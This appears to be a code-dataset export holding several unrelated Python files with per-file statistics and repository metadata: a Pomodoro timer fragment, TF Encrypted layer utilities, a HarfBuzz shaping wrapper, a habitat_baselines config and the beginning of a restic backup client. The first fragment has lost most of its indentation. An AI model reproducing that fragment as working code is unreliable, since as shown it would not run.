self.finish_timer()
def toggle_start_stop(self) -> None:
if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.FINISHED_BREAK):
self.timer.start()
self.status = PomodoroStatus.WORK
self.__play_alarm_sound(ALARM_START_PATH)
elif self.status == PomodoroStatus.PAUSED_WORK:
self.timer.continue_()
self.status = PomodoroStatus.WORK
elif self.status == PomodoroStatus.FINISHED_WORK:
self.timer.start()
self.status = PomodoroStatus.BREAK
elif self.status == PomodoroStatus.PAUSED_BREAK:
self.timer.continue_()
self.status = PomodoroStatus.BREAK
elif self.status == PomodoroStatus.WORK:
self.timer.pause()
self.status = PomodoroStatus.PAUSED_WORK
elif self.status == PomodoroStatus.BREAK:
self.timer.pause()
self.status = PomodoroStatus.PAUSED_BREAK
def set_interval_settings(self, interval_settings: PomodoroIntervalSettings) -> None:
self.interval_settings = interval_settings
# Edit current timer settings without resetting
if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.WORK, PomodoroStatus.PAUSED_WORK):
self.timer.interval = interval_settings.work_secs
else:
self.timer.interval = interval_settings.break_secs
    def __play_alarm_sound(self, path) -> None:
        """Play the alarm sound at *path*, ducking the main audio output.

        NOTE(review): playback is not awaited, so the main volume is restored
        immediately after play() returns and the ducking has little audible
        effect -- see the TODO below.
        """
        curr_vol = self.audio_controller.get_volume()
        audio_decr = 15  # volume units to duck the main output by
        # Lower the main output, clamped at 0.
        self.audio_controller.set_volume(max(curr_vol - audio_decr, 0))
        alarm = audio_ap.AudioPlayer(path)
        alarm.set_volume(curr_vol)  # alarm plays at the original volume level
        alarm.play()
        # TODO: this needs to be async - wait for the alarm length
        self.audio_controller.set_volume(curr_vol)
@property
def timer_display(self) -> str:
if self.status in (PomodoroStatus.INACTIVE, PomodoroStatus.FINISHED_BREAK):
return "START TIMER"
elif self.status == PomodoroStatus.WORK:
return f"BREAK IN {self.timer.remaining_time}"
elif self.status == PomodoroStatus.BREAK:
return f"POMODORO IN {self.timer.remaining_time}"
elif self.status == PomodoroStatus.PAUSED_WORK:
return f"PAUSED [WORK {self.timer.remaining_time}]"
elif self.status == PomodoroStatus.PAUSED_BREAK:
return f"PAUSED [BREAK {self.timer.remaining_time}]"
elif self.status == PomodoroStatus.FINISHED_WORK:
return "START BREAK"
| 39.072222 | 113 | 0.681928 | 815 | 7,033 | 5.640491 | 0.159509 | 0.067435 | 0.125299 | 0.060909 | 0.510333 | 0.415271 | 0.376115 | 0.29454 | 0.258864 | 0.159887 | 0 | 0.002231 | 0.235177 | 7,033 | 179 | 114 | 39.290503 | 0.852389 | 0.072942 | 0 | 0.390625 | 0 | 0 | 0.071473 | 0.047443 | 0 | 0 | 0 | 0.005587 | 0 | 1 | 0.09375 | false | 0 | 0.078125 | 0.023438 | 0.320313 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4156d6278870fbb774b81e7ffbdf14d0c4744d9b | 2,490 | py | Python | tf_encrypted/keras/layers/layers_utils.py | wqruan/tf-encrypted | 50ee4ae3ba76b7c1f70a90e18f875191adea0a07 | [
"Apache-2.0"
] | 825 | 2019-04-18T09:21:32.000Z | 2022-03-30T05:55:26.000Z | tf_encrypted/keras/layers/layers_utils.py | wqruan/tf-encrypted | 50ee4ae3ba76b7c1f70a90e18f875191adea0a07 | [
"Apache-2.0"
] | 354 | 2019-04-18T08:42:40.000Z | 2022-03-31T18:06:31.000Z | tf_encrypted/keras/layers/layers_utils.py | wqruan/tf-encrypted | 50ee4ae3ba76b7c1f70a90e18f875191adea0a07 | [
"Apache-2.0"
] | 161 | 2019-05-02T16:43:31.000Z | 2022-03-31T01:35:03.000Z | """TF Encrypted Keras layers utils"""
import inspect
import tensorflow as tf
class UnknownLayerArgError(ValueError):
    """Raised when an argument name is not part of a Keras layer signature.

    Args:
        arg_name: TF Encrypted Keras layer argument name (string).
        layer_sign: TensorFlow Keras layer signature (dict).
        layer_name: TensorFlow Keras layer name (string).
    """

    def __init__(self, arg_name, layer_sign, layer_name):
        super().__init__()
        self.arg_name = arg_name
        self.layer_sign = layer_sign
        self.layer_name = layer_name

    def __str__(self):
        return (
            f"Argument '{self.arg_name}' is not part of the "
            f"signature for '{self.layer_name}' layers: {self.layer_sign.keys()}"
        )
class LayerArgNotImplementedError(NotImplementedError):
    """Raised when a layer argument is not yet supported in TFE.

    Args:
        arg_name: TFE layer argument name (string).
        tf_layer_name: TensorFlow Keras layer name (string).
        tf_default_arg: the default value callers must keep using.
    """

    def __init__(self, arg_name, tf_layer_name, tf_default_arg):
        super().__init__()
        self.arg_name = arg_name
        self.tf_layer_name = tf_layer_name
        self.tf_default_arg = tf_default_arg

    def __str__(self):
        return (
            f"`{self.arg_name}` argument is not implemented for layer "
            f"{self.tf_layer_name}. Please use the default value of "
            f"{self.tf_default_arg}."
        )
def default_args_check(arg, arg_name, tf_layer_name):
    """Verify that *arg* equals the TensorFlow Keras default for *arg_name*.

    Args:
        arg: TFE layer argument value to validate.
        arg_name: TFE layer argument name (string).
        tf_layer_name: TensorFlow Keras layer name (string).

    Raises:
        UnknownLayerArgError: if ``arg_name`` is not in the layer signature.
        LayerArgNotImplementedError: if a non-default value was supplied.
    """
    layer_cls = getattr(tf.keras.layers, tf_layer_name)
    signature = inspect.signature(layer_cls.__init__).parameters
    if arg_name not in signature:
        raise UnknownLayerArgError(arg_name, signature, tf_layer_name)
    default = signature[arg_name].default
    if arg != default:
        raise LayerArgNotImplementedError(arg_name, tf_layer_name, default)
| 32.337662 | 82 | 0.675904 | 323 | 2,490 | 4.866873 | 0.19195 | 0.114504 | 0.076972 | 0.038168 | 0.353053 | 0.307252 | 0.278626 | 0.244275 | 0.172392 | 0.172392 | 0 | 0 | 0.245382 | 2,490 | 76 | 83 | 32.763158 | 0.836615 | 0.283534 | 0 | 0.1 | 0 | 0 | 0.101296 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.05 | 0 | 0.275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4158338da63ba358220ee7b0c0e8ce7b54fd01ff | 5,850 | py | Python | vharfbuzz.py | KazunariTsuboi/font-engineering | 2b80182d9cdfebf9853c01295ab13046f2ccb5a1 | [
"Apache-2.0"
] | null | null | null | vharfbuzz.py | KazunariTsuboi/font-engineering | 2b80182d9cdfebf9853c01295ab13046f2ccb5a1 | [
"Apache-2.0"
] | null | null | null | vharfbuzz.py | KazunariTsuboi/font-engineering | 2b80182d9cdfebf9853c01295ab13046f2ccb5a1 | [
"Apache-2.0"
] | null | null | null | """A user-friendlier way to use Harfbuzz in Python."""
import uharfbuzz as hb
from fontTools.ttLib import TTFont
import re
class Vharfbuzz:
    """Wraps a font file plus a uharfbuzz shaper, with helpers for shaping
    text, tracing shaping steps, and rendering shaped buffers to SVG."""

    def __init__(self, filename):
        """Opens a font file and gets ready to shape text."""
        self.filename = filename
        with open(self.filename, "rb") as fontfile:
            self.fontdata = fontfile.read()
        self.ttfont = TTFont(filename)
        # Glyph IDs reported by uharfbuzz index into this list of names.
        self.glyphOrder = self.ttfont.getGlyphOrder()
        self.prepare_shaper()
        self.shapers = None  # optional shaper list forwarded to hb.shape
        self.drawfuncs = None  # created lazily by setup_svg_draw_funcs

    def prepare_shaper(self):
        """(Re)create the harfbuzz font object used for shaping."""
        face = hb.Face(self.fontdata)
        font = hb.Font(face)
        upem = face.upem
        # Shape in font units (scale equal to units-per-em).
        font.scale = (upem, upem)
        hb.ot_font_set_funcs(font)
        self.hbfont = font

    def make_message_handling_function(self, buf, onchange):
        """Build a harfbuzz message callback that calls *onchange* whenever a
        lookup actually modifies the buffer during shaping."""
        # Per-stage stack of serialized buffer snapshots, pushed at
        # "start lookup" and popped at the matching "end lookup".
        self.history = {"GSUB": [], "GPOS": []}
        self.lastLookupID = None

        def handle_message(msg, buf2):
            m = re.match("start lookup (\\d+)", msg)
            if m:
                lookupid = int(m[1])
                # Snapshot, so the "end lookup" handler can detect changes.
                self.history[self.stage].append(self.serialize_buf(buf2))
            m = re.match("end lookup (\\d+)", msg)
            if m:
                lookupid = int(m[1])
                # Only report lookups that changed the buffer contents.
                if self.serialize_buf(buf2) != self.history[self.stage][-1]:
                    onchange(self, self.stage, lookupid, self._copy_buf(buf2))
                self.history[self.stage].pop()
            if msg.startswith("start GPOS stage"):
                self.stage = "GPOS"

        return handle_message

    def shape(self, text, onchange=None):
        """Shapes a text

        This shapes a piece of text, return a uharfbuzz `Buffer` object.
        Additionally, if an `onchange` function is provided, this will be called
        every time the buffer changes *during* shaping, with the following arguments:

        - ``self``: the vharfbuzz object.
        - ``stage``: either "GSUB" or "GPOS"
        - ``lookupid``: the current lookup ID
        - ``buffer``: a copy of the buffer as a list of lists (glyphname, cluster, position)
        """
        self.prepare_shaper()
        buf = hb.Buffer()
        buf.add_str(text)
        buf.guess_segment_properties()
        self.stage = "GSUB"
        if onchange:
            f = self.make_message_handling_function(buf, onchange)
            buf.set_message_func(f)
        hb.shape(self.hbfont, buf, shapers=self.shapers)
        # Shaping is complete; later serializations include positions.
        self.stage = "GPOS"
        return buf

    def _copy_buf(self, buf):
        # Or at least the bits we care about
        outs = []
        for info, pos in zip(buf.glyph_infos, buf.glyph_positions):
            l = [self.glyphOrder[info.codepoint], info.cluster]
            # Positions are only meaningful once the GPOS stage has run.
            if self.stage == "GPOS":
                l.append(pos.position)
            else:
                l.append(None)
            outs.append(l)
        return outs

    def serialize_buf(self, buf):
        """Returns the contents of the given buffer in a string format similar to
        that used by hb-shape."""
        outs = []
        for info, pos in zip(buf.glyph_infos, buf.glyph_positions):
            outs.append("%s=%i" % (self.glyphOrder[info.codepoint], info.cluster))
            if self.stage == "GPOS":
                # position[2] is appended as "+N"; presumably the x advance,
                # matching hb-shape's serialization -- TODO confirm.
                outs[-1] = outs[-1] + "+%i" % (pos.position[2])
            if self.stage == "GPOS" and (pos.position[0] != 0 or pos.position[1] != 0):
                # Non-zero offsets are appended as "@<x,y>".
                outs[-1] = outs[-1] + "@<%i,%i>" % (pos.position[0], pos.position[1])
        return "|".join(outs)

    def setup_svg_draw_funcs(self):
        """Create and cache the hb.DrawFuncs that trace glyph outlines into
        SVG path data; the `c` argument is a mutable state dict."""
        if self.drawfuncs:
            return

        def move_to(x, y, c):
            c["output_string"] = c["output_string"] + f"M{x},{y}"

        def line_to(x, y, c):
            c["output_string"] = c["output_string"] + f"L{x},{y}"

        def cubic_to(c1x, c1y, c2x, c2y, x, y, c):
            c["output_string"] = (
                c["output_string"] + f"C{c1x},{c1y} {c2x},{c2y} {x},{y}"
            )

        def quadratic_to(c1x, c1y, x, y, c):
            c["output_string"] = c["output_string"] + f"Q{c1x},{c1y} {x},{y}"

        def close_path(c):
            c["output_string"] = c["output_string"] + "Z"

        self.drawfuncs = hb.DrawFuncs.create()
        self.drawfuncs.set_move_to_func(move_to)
        self.drawfuncs.set_line_to_func(line_to)
        self.drawfuncs.set_cubic_to_func(cubic_to)
        self.drawfuncs.set_quadratic_to_func(quadratic_to)
        self.drawfuncs.set_close_path_func(close_path)

    def glyph_to_svg_path(self, gid):
        """Return the outline of glyph *gid* as an SVG path data string."""
        if not hasattr(hb, "DrawFuncs"):
            raise ValueError(
                "glyph_to_svg_path requires uharfbuzz with draw function support"
            )
        self.setup_svg_draw_funcs()
        container = {"output_string": ""}
        self.drawfuncs.draw_glyph(self.hbfont, gid, container)
        return container["output_string"]

    def buf_to_svg(self, buf):
        """Render a shaped buffer to a standalone SVG document string."""
        x_cursor = 0
        y_cursor = 0
        paths = []  # NOTE(review): unused -- appears to be leftover
        svg = ""
        for info, pos in zip(buf.glyph_infos, buf.glyph_positions):
            glyph_path = self.glyph_to_svg_path(info.codepoint)
            # position[0]/position[1] shift this glyph's outline; presumably
            # (x_offset, y_offset) as in serialize_buf above.
            dx, dy = pos.position[0], pos.position[1]
            p = (
                f'<path d="{glyph_path}" '
                + f' transform="translate({x_cursor+dx}, {y_cursor+dy})"/>\n'
            )
            svg += p
            # Advance the pen by position[2]/position[3].
            x_cursor += pos.position[2]
            y_cursor += pos.position[3]
        svg = (
            (
                f'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 {x_cursor} 2000"'
                + ' transform="matrix(1 0 0 -1 0 1000)">\n'
            )
            + svg
            + "</svg>\n"
        )
        return svg
# v = Vharfbuzz("/Users/simon/Library/Fonts/SourceSansPro-Regular.otf")
# buf = v.shape("ABCj")
# svg = v.buf_to_svg(buf)
# import cairosvg
# cairosvg.svg2png(bytestring=svg, write_to="foo.png")
| 34.411765 | 88 | 0.558462 | 753 | 5,850 | 4.201859 | 0.280212 | 0.045512 | 0.041087 | 0.022124 | 0.190265 | 0.183312 | 0.142857 | 0.134324 | 0.134324 | 0.117889 | 0 | 0.014081 | 0.308034 | 5,850 | 169 | 89 | 34.615385 | 0.76754 | 0.143248 | 0 | 0.122951 | 0 | 0.008197 | 0.120226 | 0.007072 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122951 | false | 0 | 0.02459 | 0 | 0.213115 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
415b5b68914faf3e3638db9ddfedb6c109eb3f7e | 9,973 | py | Python | habitat_baselines/config/default.py | rpartsey/habitat-pointnav-aux | 03a24ddca8ab257f64092c70d4f2ff6805287b40 | [
"MIT",
"Unlicense"
] | 15 | 2020-07-10T15:43:02.000Z | 2022-03-09T03:11:30.000Z | habitat_baselines/config/default.py | rpartsey/habitat-pointnav-aux | 03a24ddca8ab257f64092c70d4f2ff6805287b40 | [
"MIT",
"Unlicense"
] | 2 | 2020-09-09T19:09:19.000Z | 2020-10-21T16:30:23.000Z | habitat_baselines/config/default.py | rpartsey/habitat-pointnav-aux | 03a24ddca8ab257f64092c70d4f2ff6805287b40 | [
"MIT",
"Unlicense"
] | 1 | 2021-02-05T14:50:30.000Z | 2021-02-05T14:50:30.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import List, Optional, Union
import numpy as np
from habitat import get_config as get_task_config
from habitat.config import Config as CN
DEFAULT_CONFIG_DIR = "configs/"
CONFIG_FILE_SEPARATOR = ","
# -----------------------------------------------------------------------------
# EXPERIMENT CONFIG
# -----------------------------------------------------------------------------
_C = CN()
_C.BASE_TASK_CONFIG_PATH = "configs/tasks/pointnav.yaml"
_C.TASK_CONFIG = CN() # task_config will be stored as a config node
_C.CMD_TRAILING_OPTS = [] # store command line options as list of strings
_C.TRAINER_NAME = "ppo"
_C.ENV_NAME = "NavRLEnv"
_C.SIMULATOR_GPU_ID = 0
_C.TORCH_GPU_ID = 0
_C.VIDEO_OPTION = ["disk", "tensorboard"]
_C.TENSORBOARD_DIR = "tb"
_C.VIDEO_DIR = "video_dir"
_C.TEST_EPISODE_COUNT = -1
_C.EVAL_CKPT_PATH_DIR = "data/checkpoints" # path to ckpt or path to ckpts dir
_C.NUM_PROCESSES = 16
_C.SENSORS = ["RGB_SENSOR", "DEPTH_SENSOR"]
_C.CHECKPOINT_FOLDER = "data/checkpoints"
_C.NUM_UPDATES = 10000
_C.LOG_INTERVAL = 10
_C.LOG_FILE = "train.log"
_C.CHECKPOINT_INTERVAL = 50
# -----------------------------------------------------------------------------
# EVAL CONFIG
# -----------------------------------------------------------------------------
_C.EVAL = CN()
# The split to evaluate on
_C.EVAL.SPLIT = "val"
_C.EVAL.USE_CKPT_CONFIG = True
# -----------------------------------------------------------------------------
# REINFORCEMENT LEARNING (RL) ENVIRONMENT CONFIG
# -----------------------------------------------------------------------------
_C.RL = CN()
_C.RL.REWARD_MEASURE = "distance_to_goal"
_C.RL.SUCCESS_MEASURE = "spl"
_C.RL.SUCCESS_REWARD = 2.5
_C.RL.SLACK_REWARD = -0.01
# -----------------------------------------------------------------------------
# PROXIMAL POLICY OPTIMIZATION (PPO)
# -----------------------------------------------------------------------------
_C.RL.PPO = CN()
_C.RL.PPO.clip_param = 0.2
_C.RL.PPO.ppo_epoch = 4
_C.RL.PPO.num_mini_batch = 16
_C.RL.PPO.value_loss_coef = 0.5
_C.RL.PPO.entropy_coef = 0.01
_C.RL.PPO.aux_loss_coef = 1.0
_C.RL.PPO.lr = 7e-4
_C.RL.PPO.eps = 1e-5
_C.RL.PPO.max_grad_norm = 0.5
_C.RL.PPO.num_steps = 5
_C.RL.PPO.use_gae = True
_C.RL.PPO.use_linear_lr_decay = False
_C.RL.PPO.use_linear_clip_decay = False
_C.RL.PPO.gamma = 0.99
_C.RL.PPO.tau = 0.95
_C.RL.PPO.reward_window_size = 50
# Policy
_C.RL.PPO.policy = "BASELINE"
_C.RL.PPO.POLICY = CN()
_C.RL.PPO.POLICY.name = "BASELINE"
_C.RL.PPO.POLICY.use_mean_and_var = False
_C.RL.PPO.POLICY.pretrained_encoder = False
_C.RL.PPO.POLICY.pretrained_weights = "/srv/share/ewijmans3/resnet-18-mp3d-rgbd-100m.pth"
_C.RL.PPO.POLICY.midlevel_medium = 'curvature' # "depth_zbuffer"
_C.RL.PPO.POLICY.HIERARCHICAL = CN()
_C.RL.PPO.POLICY.HIERARCHICAL.type = "linear" # linear, custom, all_for_one
_C.RL.PPO.POLICY.HIERARCHICAL.dependencies = () # A tuple representing a DAG OR a string representing a type
_C.RL.PPO.POLICY.IM = CN()
_C.RL.PPO.POLICY.IM.comm_interval = 16
# Auxiliary Tasks
_C.RL.AUX_TASKS = CN()
_C.RL.AUX_TASKS.tasks = []
_C.RL.AUX_TASKS.required_sensors = []
_C.RL.AUX_TASKS.distribution = "uniform" # one-hot, TODO gaussian
_C.RL.AUX_TASKS.entropy_coef = 0.0
_C.RL.AUX_TASKS.InverseDynamicsTask = CN()
_C.RL.AUX_TASKS.InverseDynamicsTask.loss_factor = 0.01
_C.RL.AUX_TASKS.InverseDynamicsTask.subsample_rate = 0.1
_C.RL.AUX_TASKS.ActionPrediction = CN()
_C.RL.AUX_TASKS.ActionPrediction.loss_factor = 0.01
_C.RL.AUX_TASKS.ActionPrediction.subsample_rate = 0.1
_C.RL.AUX_TASKS.ActionPrediction.num_steps = 3
_C.RL.AUX_TASKS.ActionRecall = CN()
_C.RL.AUX_TASKS.ActionRecall.loss_factor = 0.01
_C.RL.AUX_TASKS.ActionRecall.subsample_rate = 0.1
_C.RL.AUX_TASKS.ActionRecall.num_steps = 3
_C.RL.AUX_TASKS.TemporalDistanceTask = CN()
_C.RL.AUX_TASKS.TemporalDistanceTask.loss_factor = 0.1
_C.RL.AUX_TASKS.TemporalDistanceTask.num_pairs = 1 # in lieu of subsample rate
_C.RL.AUX_TASKS.TemporalReachTask = CN()
_C.RL.AUX_TASKS.TemporalReachTask.loss_factor = 1.0
_C.RL.AUX_TASKS.TemporalReachTask.threshold = 10
_C.RL.AUX_TASKS.TemporalReachTask.num_pairs = 1
_C.RL.AUX_TASKS.ForwardDynamicsTask = CN()
_C.RL.AUX_TASKS.ForwardDynamicsTask.loss_factor = .0002
_C.RL.AUX_TASKS.ForwardDynamicsTask.subsample_rate = 0.1
_C.RL.AUX_TASKS.CPCA_Single = CN()
_C.RL.AUX_TASKS.CPCA_Single.loss_factor = 0.05
_C.RL.AUX_TASKS.CPCA_Single.num_steps = 8
_C.RL.AUX_TASKS.CPCA_Single.subsample_rate = 0.2
_C.RL.AUX_TASKS.CPCA_Single_A = _C.RL.AUX_TASKS.CPCA_Single.clone()
_C.RL.AUX_TASKS.CPCA_Single_A.num_steps = 2
_C.RL.AUX_TASKS.CPCA_Single_B = _C.RL.AUX_TASKS.CPCA_Single.clone()
_C.RL.AUX_TASKS.CPCA_Single_B.num_steps = 4
_C.RL.AUX_TASKS.CPCA_Single_C = _C.RL.AUX_TASKS.CPCA_Single.clone()
_C.RL.AUX_TASKS.CPCA_Single_C.num_steps = 8
_C.RL.AUX_TASKS.CPCA_Single_D = _C.RL.AUX_TASKS.CPCA_Single.clone()
_C.RL.AUX_TASKS.CPCA_Single_D.num_steps = 16
_C.RL.AUX_TASKS.CPCA = CN()
_C.RL.AUX_TASKS.CPCA.loss_factor = 0.05
_C.RL.AUX_TASKS.CPCA.num_steps = 1
_C.RL.AUX_TASKS.CPCA.subsample_rate = 0.2
_C.RL.AUX_TASKS.CPCA_A = _C.RL.AUX_TASKS.CPCA.clone()
_C.RL.AUX_TASKS.CPCA_A.num_steps = 2
_C.RL.AUX_TASKS.CPCA_B = _C.RL.AUX_TASKS.CPCA.clone()
_C.RL.AUX_TASKS.CPCA_B.num_steps = 4
_C.RL.AUX_TASKS.CPCA_C = _C.RL.AUX_TASKS.CPCA.clone()
_C.RL.AUX_TASKS.CPCA_C.num_steps = 8
_C.RL.AUX_TASKS.CPCA_D = _C.RL.AUX_TASKS.CPCA.clone()
_C.RL.AUX_TASKS.CPCA_D.num_steps = 16
_C.RL.AUX_TASKS.CPCA_Weighted = CN()
_C.RL.AUX_TASKS.CPCA_Weighted.loss_factor = 0.05
_C.RL.AUX_TASKS.CPCA_Weighted.subsample_rate = 0.2
_C.RL.AUX_TASKS.GID = CN()
_C.RL.AUX_TASKS.GID.loss_factor = 0.2
_C.RL.AUX_TASKS.GID.num_steps = 4
_C.RL.AUX_TASKS.GID.subsample_rate = 0.2
_C.RL.AUX_TASKS.ActionDist = CN()
_C.RL.AUX_TASKS.ActionDist.loss_factor = 0.2
_C.RL.AUX_TASKS.ActionDist.num_steps = 4
_C.RL.AUX_TASKS.ActionDist.subsample_rate = 0.2
_C.RL.AUX_TASKS.ActionDist_A = _C.RL.AUX_TASKS.ActionDist.clone()
_C.RL.AUX_TASKS.ActionDist_A.num_steps = 2
_C.RL.AUX_TASKS.SensorPrediction = CN()
_C.RL.AUX_TASKS.SensorPrediction.loss_factor = 0.05
_C.RL.AUX_TASKS.SensorPrediction.subsample_rate = 0.2
_C.RL.AUX_TASKS.SensorPrediction.goal = "objectgoal"
_C.RL.AUX_TASKS.VisionContrastedSP = CN()
_C.RL.AUX_TASKS.VisionContrastedSP.loss_factor = 0.05
_C.RL.AUX_TASKS.VisionContrastedSP.subsample_rate = 0.2
_C.RL.AUX_TASKS.VisionContrastedSP.sensor = "semantic"
_C.RL.AUX_TASKS.Dummy = CN()
_C.RL.PPO.use_normalized_advantage = True
_C.RL.PPO.hidden_size = 512
# -----------------------------------------------------------------------------
# DECENTRALIZED DISTRIBUTED PROXIMAL POLICY OPTIMIZATION (DD-PPO)
# -----------------------------------------------------------------------------
_C.RL.DDPPO = CN()
_C.RL.DDPPO.sync_frac = 0.6
_C.RL.DDPPO.distrib_backend = "GLOO"
_C.RL.DDPPO.rnn_type = "LSTM"
_C.RL.DDPPO.num_recurrent_layers = 2
_C.RL.DDPPO.backbone = "resnet50"
_C.RL.DDPPO.pretrained_weights = "data/ddppo-models/gibson-2plus-resnet50.pth"
# Loads pretrained weights
_C.RL.DDPPO.pretrained = False
# Loads just the visual encoder backbone weights
_C.RL.DDPPO.pretrained_encoder = False
# Whether or not the visual encoder backbone will be trained
_C.RL.DDPPO.train_encoder = True
# Whether or not to reset the critic linear layer
_C.RL.DDPPO.reset_critic = True
# -----------------------------------------------------------------------------
# ORBSLAM2 BASELINE
# -----------------------------------------------------------------------------
_C.ORBSLAM2 = CN()
_C.ORBSLAM2.SLAM_VOCAB_PATH = "habitat_baselines/slambased/data/ORBvoc.txt"
_C.ORBSLAM2.SLAM_SETTINGS_PATH = (
"habitat_baselines/slambased/data/mp3d3_small1k.yaml"
)
_C.ORBSLAM2.MAP_CELL_SIZE = 0.1
_C.ORBSLAM2.MAP_SIZE = 40
_C.ORBSLAM2.CAMERA_HEIGHT = get_task_config().SIMULATOR.DEPTH_SENSOR.POSITION[
1
]
_C.ORBSLAM2.BETA = 100
_C.ORBSLAM2.H_OBSTACLE_MIN = 0.3 * _C.ORBSLAM2.CAMERA_HEIGHT
_C.ORBSLAM2.H_OBSTACLE_MAX = 1.0 * _C.ORBSLAM2.CAMERA_HEIGHT
_C.ORBSLAM2.D_OBSTACLE_MIN = 0.1
_C.ORBSLAM2.D_OBSTACLE_MAX = 4.0
_C.ORBSLAM2.PREPROCESS_MAP = True
_C.ORBSLAM2.MIN_PTS_IN_OBSTACLE = (
get_task_config().SIMULATOR.DEPTH_SENSOR.WIDTH / 2.0
)
_C.ORBSLAM2.ANGLE_TH = float(np.deg2rad(15))
_C.ORBSLAM2.DIST_REACHED_TH = 0.15
_C.ORBSLAM2.NEXT_WAYPOINT_TH = 0.5
_C.ORBSLAM2.NUM_ACTIONS = 3
_C.ORBSLAM2.DIST_TO_STOP = 0.05
_C.ORBSLAM2.PLANNER_MAX_STEPS = 500
_C.ORBSLAM2.DEPTH_DENORM = get_task_config().SIMULATOR.DEPTH_SENSOR.MAX_DEPTH
def get_config(
config_paths: Optional[Union[List[str], str]] = None,
opts: Optional[list] = None,
) -> CN:
r"""Create a unified config with default values overwritten by values from
`config_paths` and overwritten by options from `opts`.
Args:
config_paths: List of config paths or string that contains comma
separated list of config paths.
opts: Config options (keys, values) in a list (e.g., passed from
command line into the config. For example, `opts = ['FOO.BAR',
0.5]`. Argument can be used for parameter sweeping or quick tests.
"""
config = _C.clone()
if config_paths:
if isinstance(config_paths, str):
if CONFIG_FILE_SEPARATOR in config_paths:
config_paths = config_paths.split(CONFIG_FILE_SEPARATOR)
else:
config_paths = [config_paths]
for config_path in config_paths:
config.merge_from_file(config_path)
if opts:
for k, v in zip(opts[0::2], opts[1::2]):
if k == "BASE_TASK_CONFIG_PATH":
config.BASE_TASK_CONFIG_PATH = v
config.TASK_CONFIG = get_task_config(config.BASE_TASK_CONFIG_PATH)
if opts:
config.CMD_TRAILING_OPTS = opts
config.merge_from_list(opts)
config.freeze()
return config
| 36.531136 | 108 | 0.684348 | 1,562 | 9,973 | 4.046095 | 0.214469 | 0.060759 | 0.076899 | 0.140981 | 0.446994 | 0.268671 | 0.205854 | 0.187184 | 0.137025 | 0.051899 | 0 | 0.024071 | 0.112704 | 9,973 | 272 | 109 | 36.665441 | 0.690134 | 0.227314 | 0 | 0.010101 | 0 | 0 | 0.057266 | 0.030664 | 0 | 0 | 0 | 0.003676 | 0 | 1 | 0.005051 | false | 0 | 0.020202 | 0 | 0.030303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
415c300c1fc04be956dd24ffadcfc44181fd9b54 | 10,681 | py | Python | backup_client.py | evermind/restic-backupclient | 347fd6bfae0f967adac1b65775245f6e87a8c554 | [
"MIT"
] | null | null | null | backup_client.py | evermind/restic-backupclient | 347fd6bfae0f967adac1b65775245f6e87a8c554 | [
"MIT"
] | null | null | null | backup_client.py | evermind/restic-backupclient | 347fd6bfae0f967adac1b65775245f6e87a8c554 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from os import environ
import logging as log
import argparse
from crontab import CronTab
from datetime import datetime,timedelta
import time
import subprocess
import os.path
import re
import yaml
import shutil
import elasticdump
import mysqldump
import pgdump
import mongodump
import influxdump
def fail(msg, args):
    """Log *msg* (a %-style format string with one argument) and abort.

    Terminates the process with exit status 1.
    """
    log.error(msg, args)
    # raise SystemExit instead of quit(): quit() is injected by the `site`
    # module for interactive use and may be missing in some environments.
    raise SystemExit(1)
def resolve_env_placeholders(template):
    """Expand ``$(VAR)`` placeholders in *template* from the environment.

    Substitution is repeated (placeholders may expand into further
    placeholders) for at most ten passes; unknown variables are left
    verbatim.
    """
    for _ in range(10):
        substituted = False
        for token, var in re.findall('(\\$\\(([a-zA-Z0-9_-]+)\\))', template):
            if var in environ:
                template = template.replace(token, environ[var])
                substituted = True
        if not substituted:
            break
    return template
# Module-private sentinel: lets callers pass None as a legitimate default.
UNDEFINED = object()


def get_env(name, default=UNDEFINED):
    """Return environment variable *name* with $(...) placeholders resolved.

    Returns *default* when the variable is unset and a default was supplied;
    otherwise aborts the process via fail().
    """
    if name in environ:
        return resolve_env_placeholders(environ[name])
    # Fix: compare the sentinel by identity, not `!=` -- a default value with
    # a custom __eq__ could otherwise compare equal to the sentinel object.
    if default is not UNDEFINED:
        return default
    fail('Please set the environment variable %s', name)
class ParseCronExpressions(argparse.Action):
    """argparse action that parses each value into a crontab.CronTab."""

    def __init__(self, option_strings, dest, **kwargs):
        super().__init__(option_strings, dest, **kwargs)

    def __call__(self, parser, namespace, values, option_string=None):
        parsed = []
        for expression in values:
            try:
                parsed.append(CronTab(expression))
            except ValueError as err:
                # Surface an argparse-native error naming the bad expression.
                raise argparse.ArgumentError(self, '%s: %s' % (expression, err))
        setattr(namespace, self.dest, parsed)
def get_next_schedule(crontab):
    """Return the soonest upcoming fire time across the given CronTab list."""
    now = datetime.now()
